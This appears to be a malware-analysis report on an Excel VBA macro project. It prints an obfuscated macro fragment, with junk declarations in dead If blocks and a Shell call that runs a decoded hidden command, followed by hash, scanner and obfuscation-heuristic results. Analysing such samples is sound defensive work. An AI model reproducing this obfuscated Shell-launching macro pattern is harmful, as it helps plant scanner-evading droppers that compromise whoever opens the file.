Dim bpMGOVINeGzssGSnFIHHJlyRYuHRMhQOozRMGpBiBgv As Integer
If 38 = 31 Then
Dim wtKcKkaFzKpDqrvhUOqBwplEsoGhQHYGdpBYORwglcRDyvbVL As Date
Dim HgUKeyHHFkVesosljaBqWTDRJPUYhGwNkWIaDvyquQIhaCsnZROVZfoodDB As String
End If
Dim PejaznItWgRhobKvGKWqHWgzPraoFiUwAtjLLqIt As Integer
If 36 = 48 Then
Dim SJWGHjauOjhdHMtsxkKIMUno As Date
Dim LUhuszkQBcXyAZrfRgZWArpnArOafAhyVivm As String
End If
Shell ujJoUYppBnLKtVHRtxixsYzhpaFc(Urarx), MUtvfDszfbYaZLEjhyyOubCftNfWjbzuSMcguPfpdHlSYHXgTQzqcrilSOBRYWQDbeHNiYpRTIkmqjGmqyCTcJSberO
Dim CfCPyRbfovsXsfqfuQnUftuBkJlBvZcReEdleJYiQJyE As Integer
If 38 = 57 Then
Dim yqizJBDEuaHIkAeogakP As Date
Dim TasnCFBlsFEVuqCublruVXWExUAdejCqZjkYxuxEzRMpVl As String
End If
Dim NuykNviptvDoqhEXHICOvLFdxgnmuEKhiMGGeuW As Integer
If 51 = 43 Then
Dim HHjqoVIEQAcKEmHpC As Date
Dim oVmgHwvplWGdbxsNlvHLVQIocXlStGuaWDRJHqzLoADyC As String
End If

End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 50688 bytes
SHA-256: 129aa01b461cf9557760248972eded73fa6f3e3b7afd148f575219c369e9db7e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
907 of 1176 identifiers look randomly generated (e.g. 'yOZDxvOZEFQflwBTXqBEDUlYvLNpipvwKwUpYmhd') — consistent with name-mangling obfuscation. Carved artifact contains 5 long base64-like blob(s).